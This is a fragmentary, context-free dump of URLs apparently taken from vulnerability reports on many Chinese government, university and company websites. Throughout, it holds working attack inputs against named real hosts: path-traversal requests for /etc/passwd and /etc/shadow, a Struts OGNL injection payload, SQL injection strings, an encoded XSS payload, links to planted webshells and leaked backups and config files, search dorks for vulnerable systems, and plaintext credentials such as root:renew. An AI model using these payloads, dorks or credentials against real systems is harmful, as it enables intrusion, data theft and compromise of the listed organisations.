http://weibo.com/1898506183/B49HFrvVx https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://judge.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog https://api.weibo.com/oauth2/authorize?client_id=2988081241&redirect_uri=http://xxxx.sinaapp.com/callback?next=http://judge.sinaapp.com&response_type=code&forcelogin=true&scope=follow_app_official_microblog http://www.kkapp.com/details_913536.html http://www.yunyin.com/ics/case/client.cfm http://www.rymusic.com.cn/main/(人民音乐出版社) http://www.aibang.com/?area=bizpay&cmd=card&id= http://202.108.65.139:8080/ http://202.108.65.139:8080/page.jsp?type=2&id=300 http://120.192.117.227/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=%CC%A9%B7%BF%C8%A8%D6%A4%CC%A9%D7%D6%B5%DA249581%BA%C5 http://www.xyfg.gov.cn//bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=%CC%A9%B7%BF%C8%A8%D6%A4%CC%A9%D7%D6%B5%DA249581%BA%C5 http://222.132.190.46/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=%CC%A9%B7%BF%C8%A8%D6%A4%CC%A9%D7%D6%B5%DA249581%BA%C5 http://huodong.renren.com/inc/n2/.svn/entries http://comix.renren.com/inc/n2/.svn/entries http://cxpt.gzcc.gov.cn:8001/cxpj_gz/toLogin.action http://taokebao.v5portal.com/productask.aspx?id=1 http://anyltics.ccidnet.com/ http://stat.ccidnet.com/ http://wooyun.org/bugs/wooyun-2012-09977 http://stat.ccidnet.com/register.php http://stat.ccidnet.com/manage_user.php) http://stat.ccidnet.com/manage_user.php?action=edituser&managerid=wooyun&type=wooyun http://www.yunyin.com/ics/case/client.cfm http://www.rymusic.com.cn/main/(人民音乐出版社) http://cq.189.cn/mall/order/detail?acceptId=EMA201308022131044147 http://cq.189.cn/mall/order/detail?acceptId=EMA201312261749238834 http://www.cq.189.cn/mall/order/detail?acceptId=EMA201402281440020936 http://lol.uuu9.com/lolgl/adminlolgl/LOLManager.aspx http://marx.ustb.edu.cn/NewsDetail.aspx?id=451&dict_id=451 http://cauef.cau.edu.cn/read_article.jsp?col=23&id=1362 http://www.cupljob.net/cn/detail.php?id=13953 http://www.sqzwfw.gov.cn/news/newsDetailAction!query.shtml;jsessionid=wKgTZgBQUwnN3pipWuMmjko_h_v1EckGNX8A?infoid=2073&infotype=InfoZCFG http://www.ahzw.gov.cn/news/newsDetailAction!query.shtml?infoid=13334 http://www.czzw.gov.cn/news/newsDetailAction!query.shtml;jsessionid=06DB312DF2D4B1A5B6E3A8C01F8C9479?infoid=1449&infotype=InfoZHXW http://www.sxxzfw.gov.cn/news/newsDetailAction!query.shtml;jsessionid=43A9D749D42A321287AC2AF79D87CB90?infoid=999&infotype=InfoZXJB inurl:jsessionid http://saas.56app.com/kuaidi/query.shtml;jsessionid=D867DE1075FFB604AD8D3232F2C5DA01 http://houqin.buct.edu.cn/picnewsread.asp?id=01573 http://open.17wo.cn/admin/ http://www.dangshi.cnki.net:8080/Nwkc/front/homehomeAction.action http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=266 http://join.yundasys.com/.svn/entries http://oos.yundasys.com/.svn/entries http://ioa.yundasys.com/.svn/entries http://mail.haier.com/ http://www.diyou.cc/?plugins&q=areas&area_id=174 http://www.diyou.cc/?plugins&q=areas&area_id=174 www.diyou.cc https://cas.dgut.cn http://www.tiantian.com/products/search/index?Ajax_CallBack=true post:Ajax_CallBackType=BizControls.common.ProductControl&Ajax_CallBackMethod=GetActionJson&Ajax_CallBackArgument0=j002355&Ajax_CallBackArgument1=1&Ajax_CallBackArgument2=1397 http://pfp.sina.net/public/actPriceQuery.php?which=res&resid=100&tm=1400117554535,参数resid过滤了单引号,加上%df%27触发宽字符漏洞,报错: http://pfp.sina.net/agent/login.php http://vips100.sina.net/ http://vips100.sina.net/styling/common.css/1.php,成功解析 http://home.focus.cn/ http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://home.focus.cn/common/modules/spk/reg.php?id=628 http://www.tuniu.com/guide/interface/searchsolr/index?tpl=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 http://www.tuniu.com/guide/interface/searchsolr/index?tpl=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fself%2ffd%2f2%00.php http://econ.ruc.edu.cn/displaynews.php?id=11647 http://law.bjtu.edu.cn/detail.asp?id=355&mtype=1&num=2 https://www.gzekt.com/DetailAction_findDetailById.action?orderform.orderid=20140512100020000021 https://www.gzekt.com/DetailAction_findDetailById.action?orderform.orderid=20140413100020000023 https://www.gzekt.com/DetailAction_findDetailById.action?orderform.orderid=20140420100020000002 https://www.gzekt.com/BussiAction_applicationCenter.action?business.busicode=100009 http://202.116.0.173/ http://rsj.huiyang.gov.cn/zn.asp?classid=6502 http://rsj.huiyang.gov.cn/more.asp?classid=6503 http://rsj.huiyang.gov.cn/display.asp?articleid=75073 http://115.182.21.54/ http://m.17wo.cn/smc http://art.jlu.edu.cn/info_edit.php?id=1266 http://u.163.com/t/AAA http://u.163.com/t/BBB http://u.163.com/t/CCC http://web.jlnu.edu.cn/rsc/class/new2.php?id=573 http://211.87.224.132/install/ http://www.6660201.com/hkhy_content.asp?ID=5注入连接 http://www.aili.com.cn/aili.rar http://115.29.240.166/ http://www.bacic5i5j.com/culture/corenews/?type=2&newstype=21 http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://automation.sjtu.edu.cn/wwwroot.rar http://www.lijiang-airport.com/bbs/print.asp?id=3743 http://www.lijiang-airport.com/bbs/ljbbsdb/bbsxp.mdb http://bbs.siteserver.cn/thread-8-441286.aspx http://www.gzekt.com/password_find211.jsp?custname=16035329 http://job.tuniu.com/center/center/resume http://ebooking.airchina.com.cn/AMRWeb/shopping/search/showSearchPage_amrshop.action?class.classLoader.resources.dirContext.docBase=../ http://pmath.jlu.edu.cn/answersystem/question/admin/login.asp http://x.oupeng.com/download/download_action.php?action=search&word=2 http://www.xinhaisoft.com/ http://www.xinhaisoft.com/CustomerList.aspx http://www.xinhaisoft.com http://www.xxx.com/xxx/admin/fileopen.asp?filename=../index.asp http://www.xxx.com/admin/fileopen.asp?filename=../index.asp http://vci.jlu.edu.cn/yxcy.aspx?id=13 http://auto.jlu.edu.cn/editor/admin_login.asp http://www.easybonuscard.com:8888/auth/signon.jsp http://oa.bamatea.com http://oa.moonbasa.com http://oa.etonetech.com http://oa.ztcz.cn http://218.249.130.74 http://119.146.190.170:9988 http://zhidao.baidu.com http://wenku.baidu.com http://223.4.22.36 http://222.243.160.83:9090 http://www.chipshow.cn http://116.205.96.170:9090 http://www.sxjbjt.com:9090 http://122.225.203.168:8888 http://oa.chinabed.com http://oa.lutongnet.com http://oa.zetacn.com:9090 http://oa.zhcpt.edu.cn http://www.doc88.com http://oa.sinodata.com.cn http://www.docin.com http://www.koyochem.com:8080 http://61.186.155.27 http://oa.nyinn.cn http://115.236.65.115:9090 http://119.146.190.118:8089 http://219.137.250.133 http://123.133.29.174:9090 http://koa.ecp888.com http://www.cting.com.cn http://oa.suncorps.cn http://59.41.47.211 http://oa.bamatea.com:9090 http://oa.zhenaiws.com http://www.koyochem.com:9191 http://60.208.131.46:9090 http://219.131.221.174:9090 http://oa.bnuz.edu.cn:8080 http://183.238.59.61:9090 http://218.205.208.22:9090 http://oa.xhlbdc.com http://124.193.165.174:9090 http://218.75.87.186:9090 http://oa.eva-group.com:511 http://113.106.92.16:9090 http://oa.cqmsy.com http://cting.com.cn http://220.231.158.211 http://oa.tiholding.cn http://124.172.170.141:9090 http://oa.hengdigroup.com:9090 http://www1.elkay.com.cn:9090 http://www.gzpiano.com http://oa.zaffer.cn http://oa.gdisg.com jsp:directive.page jsp:directive.page http://1.acfun.tv http://r1.acfun.tv http://blog.acfun.tv http://cp.acfun.tv http://dts.acfun.tv http://h.acfun.tv http://hengyang.acfun.tv http://hzw.acfun.tv http://ios.acfun.tv http://jfz.acfun.tv http://jj.acfun.tv http://js.acfun.tv http://live.acfun.tv http://mc.acfun.tv http://static.acfun.tv http://taiyuan.acfun.tv http://trend.acfun.tv http://tu.acfun.tv http://wap.acfun.tv http://wenzhou.acfun.tv http://wg.acfun.tv http://wiki.acfun.tv http://www.acfun.tv http://wz.acfun.tv http://xyb.acfun.tv http://www.szhtkj.com.cn/ http://www.szhtkj.com.cn/onews.asp?id=331 http://www.szhtkj.com.cn/otype.asp?owen1=3 http://cw.fjcc.edu.cn/cw/ http://59.75.114.210/ http://202.113.66.33/web/content.aspx?lb=zc http://211.64.120.63/cw/content.aspx?lb=zc http://cw.fjcc.edu.cn/cw/wd.aspx?lb=zc http://59.75.114.210/wd.aspx?lb=zc http://cw.fjcc.edu.cn:80/cw/ http://wooyun.org/bugs/wooyun-2013-036870 http://www.4008266333.com/bkupload/ContentImg/icesword.aspx http://www.4008266333.com/wwww/web.config.bak http://www.4008266333.com/css/Weinberg%20Logistics.rar inurl:ACTIONSHOWNEWS inurl:ACTIONSHOWNEWS.APPPROCESS http://jw.bhcy.cn/index.jsp http://jwcweb.lnpu.edu.cn:7001/index.jsp http://www.vtcsy.com:8080/ACTIONSHOWFILES.APPPROCESS?mode=1&FolderID=62&size=15&page=3 http://jw.bhcy.cn/index.jsp http://jw.bhcy.cn xx.com/JX/CjGL_jx08/ScoreReport/ScoreReportView.aspx?CellID= xx.com/JX/CjGL_jx08/ScoreReport/ScoreReportView.aspx?CellID=xx xx.com/JX/CjGL_jx08/ScoreReport/ScoreReportEdit.aspx?ScoreReportID= http://wkzx.hbu.edu.cn/Resourse.aspx?NTId=27 google:inurl:riseapprove_web/secondPage/deptProceedingDetailsx.do http://u8dev.yonyou.com http://u8dev.yonyou.com/default1.aspx http://www.yungoucms.cn做测试。 http://www.yungoucms.cn/?/admin做测试 http://www.foyoedu.com/) http://www.wzew.cn/cjcx/ http://www.ahczzx.cn:8000/cjcx/index.aspx http://www.syun.edu.sh.cn/cjcx/index1.asp http://www.kj.edu.sh.cn/cjcx/index1.asp http://exam.fdfz.cn/cjcx/index1.asp http://218.78.241.94/cjcx/index1.asp http://yyzx.ijd.cn/cjcx/index1.asp http://222.66.36.96/cjcx/ http://www.2fzszxy.fudan.edu.cn/cjcx/index1.asp学校信息化工作平台 http://218.78.241.94 http://wolife.17wo.cn www.xxx.com www.xxx.com http://www.xxx.com/account.php?act=delete&id=6 http://zm.17wo.cn https://192.168.0.249/直接到了登陆界面,百度之,才知道有PC版管理端和web管理端。 http://news.hnvs.cn/!team www.xmgwbn.com http://www.xmgwbn.com/job/main.php?id=36 http://www.xmgwbn.com/job/main.php?id=36 http://www.sqlmap.org www.xmgwbn.com\session http://www.yungoucms.cn做测试。 http://www.yungoucms.cn/help/1 http://www.yungoucms.cn/help/1* http://golf.ifeng.com/e/extend/ask/AskResult.php http://shsj.caep.ac.cn/zxzc/person.asp?meetingid=4 http://shsj.caep.ac.cn/zxzc/person.asp?meetingid=4&attenderid=4332 http://point.gzgwbn.net.cn/fckeditor/editor/filemanager/connectors/test.html http://point.gzgwbn.net.cn/UploadFiles/file/asp.asp/111.jpg http://point.gzgwbn.net.cn/newsinfo.aspx?nid=83 http://point.gzgwbn.net.cn/newsinfo.aspx?nid=83 http://www.sqlmap.org http://kp.xf.cn/ http://localhost/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute http://www.qada.gov.cn/admin/login.asp,会被不法分子扫描,进行破坏 http://itfax.cttzj.com/Index07_1.asp?ID=29 http://itfax.cttzj.com/scripts/ http://itfax.cttzj.com/aspnet_client/ http://itfax.cttzj.com/admin http://www.gwbn.cq.cn/service.asp?articleid=628&type=new http://www.gwbn.cq.cn/service.asp?articleid=628&type=new http://www.sqlmap.org www.gwbn.cq.cn\session http://www.lezhixing.com.cn/cms/lzx/case/index.jhtml http://202.108.154.209/datacenter/# http://vshare.wo.com.cn/ http://vshare.wo.com.cn/album_list?key=1 http://vshare.wo.com.cn/album_list?key=1 http://vshare.wo.com.cn/album_list?key=1% http://xzrsksw.lxsk.com/article/ShowArticleList.aspx?AType=xwdt http://xzrsksw.lxsk.com/Login.aspx用户登录存在post注入 http://123.131.133.150:8080/wcm/ http://61.153.63.94/wcm http://www.cflac.org.cn/wcm http://wcm.xxz.gov.cn:8080/wcm/ http://www.jscnt.gov.cn/wcm/ http://www.sccnt.gov.cn http://218.94.123.203/wcm http://203.86.89.25/wcm/ http://www.lfcgs.gov.cn:8080/wcm/ http://iwr.cass.cn/wcm/ http://www.whxinzhou.gov.cn:9090/wcm/ http://123.131.133.150:8080/wcm/ http://122.224.174.82:8090/wcm/ http://www.qhepb.gov.cn http://211.154.254.113:8080/wcm/ http://app.yonyou.com/office/ http://academy.yonyou.com/default3.aspx http://wooyun.org/bugs/wooyun-2014-059478 http://www.dascomsoft.com/)开发的高校数字化学习中心系统存在自定义页面等多处上传漏洞,由于很多学校使用该系统,影响非常大。 http://www.dascomsoft.com/website/cases.aspx列出了300所高校使用该系统。 http://27.22.85.54:18080/suite/images/ http://27.22.85.54:18080/suite/include/ http://27.22.85.54:18080/suite/bin/ http://27.22.85.54:18080/suite/download http://27.22.85.54:18080/suite/bin http://27.22.85.54:18080/suite/tools http://27.22.85.54:18080/suite/wap http://www.hceb.edu.cn:8080/suite/include/ http://221.232.128.78:83/WebSite/News.aspx?id=412 http://www.hbinvest.gov.cn/prws/index2.aspx?area_code=420600&str= http://www.yafcj.com/Web_Site/house_list.aspx?lmid=17 http://58.19.182.234:8090/PBBS/publicnoticeservlet?command=downloadFile&instanceuuid= http://www.sandpay.com.cn/website/common/detail.do?kind=%E6%8C%81%E5%8D%A1%E4%BA%BA%E6%9C%8D%E5%8A%A1%EF%BC%8D%E6%8C%81%E5%8D%A1%E4%BA%BA%E5%B8%B8%E8%A7%81%E9%97%AE%E9%A2%98&goto=article&id=56 http://www.xfxzfw.gov.cn:8083/ http://www.sdban.com/html/2014/03/07/ http://www.sdban.com/src/ http://www.sdban.com/src/Beelink2006_JYSRC.rar http://www.ctttj.com/shell.asp http://www.ctttj.com/jsyd_show.asp?news_id=233 http://www.ctttj.com/include/ http://www.ctttj.com/Images/ http://www.wxinn.com/hotel/PhotoC.php?type=1 http://www.eastfair.com/fair/admin/upProduct.asp http://www.xxx.com/sofpro/otherproject/dcwj/dcwj.jsp?id=7%27 http://tuniu.com//giftcard/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fhosts%2500.jpg.html http://tuniu.com//giftcard/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.jpg.html http://124.115.170.112:8080/clbt/login.jsp http://114.247.129.12/ulp/login.jsp http://m.t3.com.cn:80/detail/onlineId/8367430815293495253 http://m.t3.com.cn:80/detail/onlineId/8367430815293495253* http://www.hbcz.gov.cn:8080/arkcms/guestbook/index.jsp?siteID=8a8080820b78cd84010b79331b92001e http://www.timber2005.com/ http://www.jtlcsoft.com http://www.jtlcsoft.com/bs2.asp?f=804 http://58.118.36.16/ http://tuan.aili.com/ http://tuan.aili.com/ajax/system.php?id=17871&title=%5B%E4%B8%9C%E7%9B%B4%E9%97%A8%5D+%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E4%BB%85%E5%94%AE29%E5%85%83%2C%E4%BB%B7%E5%80%BC300%E5%85%83%E5%87%BB%E5%89%91%E4%BD%93%E9%AA%8C%E8%AF%BE1%E8%8A%82!%E5%9B%BD%E5%AE%B6%E7%BA%A7%E8%BF%90%E5%8A%A8%E5%91%98%E4%B8%93%E4%B8%9A%E6%8E%88%E8%AF%BE%2C%E4%B8%BA%E6%82%A8%E5%B8%A6%E6%9D%A5%E4%B8%8D%E4%B8%80%E6%A0%B7%E7%9A%84%E6%84%9F%E5%8F%97!%E4%B8%B9%E6%96%AF%E5%87%BB%E5%89%91%E4%BF%B1%E4%B9%90%E9%83%A8%E6%AC%A2%E8%BF%8E%E6%82%A8%E7%9A%84%E5%88%B0%E6%9D%A5!&team_id=57826&action=showbaidumap http://yanjing.com.cn/ConTent.asp?MainId=4&BigClassid=1 http://124.207.155.136:8080/signUp/system/indexLogin.action http://www.olpe.cn/dy_show.php?tid=4&aid=22&id=62 http://www.chinanet.cc/cpweb/cpweb.asp?typeid=1 http://www.hangzhou120.net.cn/topic_detail.php?classid=52&id=78 http://218.94.107.84:8080/zw/ http://218.94.107.84:8080/zw/download.jspx?dispatch=download&loadWhere=loadData&filename=WinRAR.exe&fpath=download http://218.94.107.84:8080/zw/download.jspx?dispatch=download&loadWhere=loadData&filename=tomcat-users.xml&fpath=../../conf/ http://218.94.107.84:8080/manager/html/ http://card.17wo.cn/htlogin.php http://jmzj.jmwjm.gov.cn:8080/ http://www.grustv.com/admin/index.asp example:http://www.grustv.com/about.asp?id=489 http://120.194.234.178:9999/lh/login.action?actions=index SHELL:http://120.194.234.178:9999/lh/bak.jsp http://xiaobao.snnu.edu.cn/bencandy.php?id=965 http://training.yyzzgz.gov.cn/ http://www.chanjet.com/bencandy.php?fid=41&id=185 http://bbs.auto.ifeng.com/ http://1.com\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u002f\u006f\u006e\u006c\u006f\u0061\u0064\u003d\u0061\u006c\u0065\u0072\u0074\u0028\u0031\u0029\u003e/1.swf http://bbs.auto.ifeng.com/thread-1351174-1-1.html http://travel.cmbc.com.cn/trip/payment/paymenttripaa/send.jhtml http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa data:text/html;charset=utf-8;base 64 http://cn.shop-builder.cn/ http://cn.shop-builder.cn/main.php?m=vote&s=vote http://www.tdc.zjut.edu.cn/ http://hangye.letv.com/MSG/login.html http://hangye.letv.com/MSG/index.html http://www.yndrugadmin.gov.cn/Login!input.action http://rsc.wzmc.edu.cn/List.php?BigCategoryId=26 http://job.lnu.edu.cn/common.do?method=enterprisesView&enterprisesId=3207 http://yz.cqu.edu.cn/view.php?nid=198 http://service.xjtu.edu.cn/guidedown.php?id=31 http://121.8.249.13:8080/gglList.do?method=querybybh&ggbh=20140312140825375040000 http://121.8.249.13:8080/gglList.do?method=querybybh&ggbh=20140312140825375040000 http://www.tuniu.cn/nbooking/register.html#index& http://boss.tuniu.org/VND/VND_admit/view/agencyCheckedList.html?eyJ1aWQiOiI1Mjc2Iiwibmlja25hbWUiOiJcdTY3NGVcdTUwMjkyIiwidXNlcm5hbWUiOiJsaXFpYW4yIiwiciI6Mjc2ODUzNTU4fQ== http://www.hpu.edu.cn/siteserver/platform/background_dbSqlQuery.aspx http://www.hpu.edu.cn/sitefiles/TemporaryFiles/only/1.asp http://113.106.216.242:7001/hznt/sys/downloadModel.sy?fileName=/../../../../../../../../../../../../etc/password http://113.106.216.242:7001/hznt/sys/downloadModel.sy?fileName=/../../../../../../../../../../../../etc/shadow www.10000114.com/search/search_result_company.aspx?key=%u5305%u8F66&city=256&pro=19 http://www.jjrjw.cn:8080/sFileShow1.jsp?index=363 http://www.jjrjw.cn:8080/sFileShow1.jsp?index=363 http://www.chinapoo.cn/)的这套系统是不公开下载的,但是由于某个子站管理不当,管理员将网站程序打包放到网站目录下,被我下载了一套,之前为cncert提供过一次这个建站系统的多个漏洞,最近又分析了一下代码,之前的漏洞已经修补了,但仍然发现存在很多漏洞,由于上次拿了官网的shell,目前官网用了IIS防护软件,所以不好拿来演示,但是官网有一个栏目展示他们的很多作品(客户网站),很贴心,我们随便挑一个来演示吧。 http://www.chinapoo.cn/info/listinfo.dll?infoid=218 http://www.xinfangsheng.com/ http://ask.yaolan.com/ask.html http://space.yaolan.com/u/54034721/ http://ask.yaolan.com/question/1405171414059240ba43.html http://117.121.54.22 http://117.121.54.22/cdn.cfg http://192.168.200.1/centos http://117.121.54.22/isolinux.cfg http://192.168.200.1/centos http://192.168.200.1/centos http://221.0.92.70:8080/inspection/UL/districtsubdivision/displaydistrictsubdivision.jsp?method=query&type=edit&SYSNO=01200812150014 http://tourism.qdu.edu.cn/dede/login.php http://mdetc.sdufe.edu.cn/admin_login.aspx http://www.idc.hk/NewsDetail.aspx?art_id=192 http://img.aibang.com/pic?picid=9ba4479bb351ee0f&type= http://jw.jstu.edu.cn/ http://jw.jstu.edu.cn/ArticleView.aspx?Type=0&Id=970e4559-0125-4f6b-9071-36534171a085 http://jw.jstu.edu.cn/admin/login.aspx http://www.gz163.cn/?m=index&c= https://ovp.lenovo.com/lenovo-ovp/login.action https://ovp.lenovo.com/lenovo-ovp/1.txt http://yjsy.pku.edu.cn:8080/students/shownews.php?id=27 http://room.space.twtstudio.com/details.php?table=office&id=6 http://drops.wooyun.org/papers/548 http://ah.118100.cn/cring/jsp/user/shop_moregift.jsp?giftType=1 http://ah.118100.cn/cring/jsp/user/shop_moregift.jsp?giftType=1 http://www.sqlmap.org http://www.yfidea.com/product.asp http://demo.yfidea.com/ http://www.yfidea.com/AnLi.asp http://oa.bh5z.net/Index.asp http://222.178.145.174:8000/Index.asp http://oa.gz65.com/ http://hsoa.bgyhs.net/ http://www.xmqwzx.com/Index.asp http://oa.lhljzx.com/ http://demo.yfidea.com/login.asp?username=123&submit2=+&Password=123 http://hl.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://hl.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://www.sqlmap.org www.myhedy.com/specs.php?id=21 http://sjc.nankai.edu.cn/showNews.aspx?id=77 http://lol.neotv.cn/.svn/entries http://10.X.X.73/func/web_main/display/net_tool/Ping http://xxx/z.sh http://qk.nchu.edu.cn/showgwjs.asp?id=3 http://down.chinaz.com/soft/29965.htm http://www.weentech.com/bbs/forum-14-1.html http://www.hlbe.gov.cn/ http://www.hlbe.gov.cn/hlbewh/nr.asp?id=5720 http://jl.118100.cn/cring/jsp/user/ringSpecialDetail.jsp?ringSpecialId= http://jl.118100.cn/cring/jsp/user/ringSpecialDetail.jsp?ringSpecialId=6565 http://www.sqlmap.org http://123.131.133.150:8080/wcm/ http://61.153.63.94/wcm http://www.cflac.org.cn/wcm http://wcm.xxz.gov.cn:8080/wcm/ http://www.jscnt.gov.cn/wcm/ http://www.sccnt.gov.cn http://218.94.123.203/wcm http://203.86.89.25/wcm/ http://www.lfcgs.gov.cn:8080/wcm/ http://iwr.cass.cn/wcm/ http://www.whxinzhou.gov.cn:9090/wcm/ http://123.131.133.150:8080/wcm/ http://122.224.174.82:8090/wcm/ http://www.qhepb.gov.cn http://211.154.254.113:8080/wcm/ http://i.sohu.com/ http://ktv.cms.bookinge.com/?m=login.checkAccount&account=1 http://www.westarsoft.com/ http://www.westarsoft.com/list/?bid=31 inurl:/zwdt/bgxz.jsp http://www.cszw.gov.cn/web/zwdt/bgxz_bg.jsp?id=101 http://zwzx.lueyang.gov.cn/web/zwdt/bgxz_bg.jsp?id=0002 http://61.161.111.133/web/zwdt/bgxz_bg.jsp?id=101 http://www.xhxspzx.com/web/zwdt/bgxz_bg.jsp?id=101 http://xzfw.xjcbcr.gov.cn/web/zwdt/bgxz_bg.jsp?id=103 http://zwzx.chenggu.gov.cn/web/zwdt/bgxz_bg.jsp?id=101 http://222.179.44.172/web/zwdt/bgxz_bg.jsp?id=128 http://www.hlxzsp.gov.cn/web/zwdt/bgxz_bg.jsp?id=101 http://fw.ynqb.gov.cn:8081/web/zwdt/bgxz_bg.jsp?id=161 http://218.200.21.34/web/zwdt/bgxz_bg.jsp?id=101 http://hb.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://hb.118100.cn/cring/jsp/user/board/banglist.jsp?boardType=0 http://www.sqlmap.org http://webmail.vanceinfo.com http://sut.edu.cn http://faxuexi.tju.edu.cn/sub_teach_program.php?id=14 http://www.verydz.com/ http://cas.xxx.xxx.letv.cn:7777/ liuwang:NULL时成功。 http://114.255.189.58/Default.aspx http://114.255.189.58/web.rar可以直接访问下载,里面是web.config http://114.255.189.58/letf.aspx http://114.255.189.58/Message/Cardit.aspx http://114.255.189.58 http://58.215.18.52/homePage.action http://zj.118100.cn:8090/cring/jsp/user/ringSpecialList.jsp?ring_special_type_id=1 http://www.sqlmap.org http://down.ggv.com.cn/down/index_02.php?wqxtype=E828 http://www.ggv.com.cn/newdown/softlist.php?wqxtype=nc3000 http://www.ggv.com.cn/login.htm http://renew.ggv.com.cn http://www.ggv.com.cn/newweb/login.php http://www.ggv.com.cn/newdown/subdownload.php?wqxtype=T1800 root:renew http://www.ggv.com.cn/newweb/topnew/top.php http://kd.czinfo.net/cx_ok.asp?u_name=122222 http://kd.czinfo.net/cx_ok.asp?u_name=122222 http://www.sqlmap.org http://www.chinacct.org/search.asp?SearchKey=a http://www.chinacct.org/admin/Login.asp http://182.151.203.169:2013/cfms/login.action http://60.247.100.113/ftp.rar http://ffp.airchina.com.cn/admin/adminLogin.jsp http://115.182.3.191/admin.tar.gz http://115.182.3.194/code.tar.gz http://kfmail.sdo.com/ http://www.576story.com/ http://www.west263.com目测是在西部数码那搞得域名或者空间于是拿着这些信息继续猜解主站和论坛的账号密码 http://58.215.55.13/report/ku6_id.php http://wsbm.npc.gov.cn/wsbm/application/editpass/editpass!input.action url:http://house.focus.cn/lslj/forum/forum_board_new.php?page_id=10&uid=0&pass=0&page=-1 site:focus.cn inurl:page_id http://jwgl.aust.edu.cn/ http://wooyun.org/bugs/wooyun-2014-054857 http://oa.corp.56.com是OA系统 http://auto.118114.cn/ http://auto.118114.cn/entry http://auto.118114.cn/block/loginact?act=get_areas&pcode=110000®istercateg=1&v=37 http://zsb.hrbcu.edu.cn/showPRsult.php?id=full http://www.haitianoa.com/ http://oa.haitianoa.com/login.asp http://www.s***.net/VOS/login.asp http://www.s***l.com/vos/login.asp http://www.***z.net:8972/login.asp http://www.***x.com/oa/login.asp http://vos.t***e.edu.cn/login.asp http://c***a.***p.net/login.asp http://121.30.***.***/login.asp http://dfoa.***l.com/login.asp http://60.**.34.**:8086/login.asp http://oa.t***.edu.cn/login.asp http://www.***u.com/login.asp http://oa.***.com.cn/login.asp http://211.68.***.***/login.asp http://oa.***y.com/login.asp http://116.228.***.***/login.asp Url:http://home.focus.cn/zxrj/account.php?this_login_id=54544875 http://home.focus.cn/elite/elite_list.php?utype=9988 http://home.focus.cn/elite/elite_list.php?utype=9988 http://jl.wo.com.cn/ http://jl.wo.com.cn/iphone/searchApp.psml http://222.73.2.29/Login.aspx admin1:123456 http://new.hbglky.com:80/ad/list.php?xw_fl=4-0 http://iec.imu.edu.cn/ inurl:szwyadmin/login.asp http://202.198.0.22/jiaowu/zpx/ http://www.fosu.edu.cn/business/party/party1/guomao/ http://www.keerqin.gov.cn/kqrd/ http://www.kxjl.org/ http://www.dlwaiyu.com/ http://www.nun.edu.cn/ http://www.zzjjx.net/ http://sace.imust.cn/jzs/ http://www.njjcedu.com/ http://jyfw.zjvtit.edu.cn/cjb/ http://www.xn--fiqr2vlzer5bvx8ehel.com/ http://jcb.zjsru.edu.cn/ http://glxyl.zjweu.edu.cn/ http://courses.cqjtu.edu.cn/ http://www.lnxrd.gov.cn/ http://218.107.63.241:82是OA系统 http://opac.jxlib.gov.cn/NTRdrLogin.aspx http://rsc.bistu.edu.cn/ http://rsc.bistu.edu.cn/NewsShow_zcfg.asp?id=360 http://sppm.bupt.edu.cn/ http://sppm.bupt.edu.cn/show_news.asp?id=362 http://www.xtlib.com/ http://www.xtlib.com/ab_cont.asp?ID=1221 http://www.js96777.com/stk/showBanks.do?bankType=1 http://www.0551nc.org/ http://www.0551nc.org/news/list.asp?news_id=137 http://www.ewinshine.com/ewinshineindex.action http://www.gdhsc.edu.cn/web.rar http://123.125.96.211:9000/robot/template/themes/blue2/images/x.jsp http://www.yffsc.com/hotSales/youpin.action?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 site:www.capub.cn http://i.sohu.com/ http://hk.chinaunicom.com/app_mgr/app-mgr/appInfo?downloadPath=Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n&m=down http://jwc.hkxy.edu.cn/jwc/SchoolView.asp?id=4 http://www.hakim.com.cn/wwwroot.rar http://no2.vod165.com/login.do http://www.ruzhou.gov.cn/login/Rjcms.do inurl:broadcastview.aspx?InfoId= http://www.xtsxzfw.gov.cn/Broadcast/broadcastview.aspx?InfoId=03158&type=infodtxx http://www.xtsxzfw.gov.cn/Broadcast/broadcastview.aspx?InfoId=03158%27and/**/%201=%28select/**/%20@@VERSION%29and/**/%271%27=%271&type=infodtxx http://zyjy.xtsxzfw.gov.cn/admin/login.aspx inurl:InFlowInformation.aspx?InfoFlowId= http://www.cdxzfww.gov.cn/chengdeshi/PostAdvise/AdviseView.aspx?InfoId=00000007%27and/**/%201=%28select/**/%20@@VERSION%29and/**/%271%27=%271 